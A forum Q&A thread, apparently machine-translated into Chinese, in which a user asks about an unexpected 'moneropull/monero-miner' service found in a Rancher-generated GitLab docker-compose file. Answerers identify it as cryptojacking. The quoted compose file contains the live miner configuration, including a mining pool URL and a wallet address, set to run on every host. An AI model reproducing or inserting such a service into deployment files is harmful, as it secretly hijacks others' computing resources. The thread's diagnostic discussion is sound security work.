我通过Rancher的目录安装了gitlab。 通过运行命令“ docker ps”,我注意到有一个Docker容器“ moneropull / monero-miner”。 我注意到该容器是Gitlab容器的基础部分。在Rancher堆栈生成的dockercompose文件下方。 我想知道“选择器”部分是否是强制性的?我真的很想把它摘下来。确实,当启动gitlab容器时,我注意到处理器的清理程度很高。
version: '2'
volumes:
gitlab-app-data:
driver: local
gitlab-conf-files:
driver: local
gitlab-log-data:
driver: local
services:
gitlab-server:
image: gitlab/gitlab-ce:9.5.10-ce.0
environment:
GITLAB_OMNIBUS_CONFIG: |-
external_url 'http://gitehost.com'
registry_external_url 'http://gitehost.com'
gitlab_rails['gitlab_shell_ssh_port'] = PORT_NUMBER
volumes:
- /home/docker-volumes/gitlab/var/opt/gitlab:/var/opt/gitlab
- /home/docker-volumes/gitlab/var/log/gitlab:/var/log/gitlab
- /home/docker-volumes/gitlab/etc/gitlab:/etc/gitlab
labels:
io.rancher.container.hostname_override: container_name
selector:
image: moneropull/monero-miner
stdin_open: true
tty: true
command:
- -a
- cryptonight
- -o
- stratum+tcp://monerohash.com:3333
- -u
- 42kVTL3bciSHwjfJJNPif2JVMu4daFs6LVyBVtN9JbMXjLu6qZvwGtVJBf4PCeRHbZUiQDzBRBMu731EQWUhYGSoFz2r9fj
- -p
- x
labels:
io.rancher.container.pull_image: always
io.rancher.scheduler.global: 'true'
答案 0 :(得分:3)
似乎您正在被加密劫持。看看这个https://kromtech.com/blog/security-center/cryptojacking-invades-cloud-how-modern-containerization-trend-is-exploited-by-attackers
很少有图像被泄露,我怀疑您不小心选择了其中一张。
答案 1 :(得分:1)
@ piy26正确指出。您的设置似乎已受到威胁。
来自rancher的原始gitlab撰写文件没有矿工服务。这是链接:https://github.com/rancher/community-catalog/blob/master/templates/gitlab/4/docker-compose.yml#L10